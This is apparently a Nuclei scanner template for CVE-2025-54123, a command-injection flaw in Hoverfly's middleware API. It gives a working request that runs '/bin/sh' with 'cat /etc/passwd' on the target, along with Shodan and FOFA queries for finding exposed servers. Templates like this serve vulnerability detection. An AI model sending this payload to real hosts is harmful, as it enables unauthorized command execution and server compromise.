id: CVE-2025-54123

info:
  name: Hoverfly <= 1.11.3 - Remote Code Execution
  author: nukunga[seonghyeonJeon]
  severity: critical
  description: |
    Hoverfly versions 1.11.3 and below are vulnerable to remote code execution (RCE) via command injection in the middleware API endpoint (/api/v2/hoverfly/middleware). Insufficient validation of the 'binary' and 'script' parameters allows an unauthenticated attacker to execute arbitrary commands on the host system.
  impact: |
    Unauthenticated attackers can inject arbitrary operating system commands through the middleware API endpoint, achieving complete server compromise.
  remediation: |
    Upgrade Hoverfly to a version later than 1.11.3 that properly validates the binary and script parameters in the middleware endpoint.
  reference:
    - https://github.com/advisories/GHSA-r4h8-hfp2-ggmf
    - https://github.com/SpectoLabs/hoverfly/security/advisories/GHSA-r4h8-hfp2-ggmf
  metadata:
    verified: true
    max-requests: 1
    shodan-query:
      - http.favicon.hash:1357234275
      - title:"Hoverfly Dashboard"
    fofa-query:
      - icon_hash="1357234275"
      - title="Hoverfly Dashboard"
  tags: cve,cve2025,hoverfly,rce,intrusive,vuln,vkev

http:
  - raw:
      - |
        PUT /api/v2/hoverfly/middleware HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
          "binary": "/bin/sh",
          "script": "cat /etc/passwd"
        }

    matchers:
      - type: dsl
        dsl:
          - "status_code == 422"
          - "regex('root:x:0:0', body)"
          - "contains_all(body, 'STDOUT:','hoverfly')"
        condition: and
# digest: 4a0a004730450220624ddaba1257a5c043c7b4f93e238e9f906dd3a3cc32bcdbc563dfcc244b8958022100a9a72f8bf5e09f2760ba6118a1ceb262c5b73d4d48066bce02caa8da46495d16:922c64590222798bb761d5b6d8e72950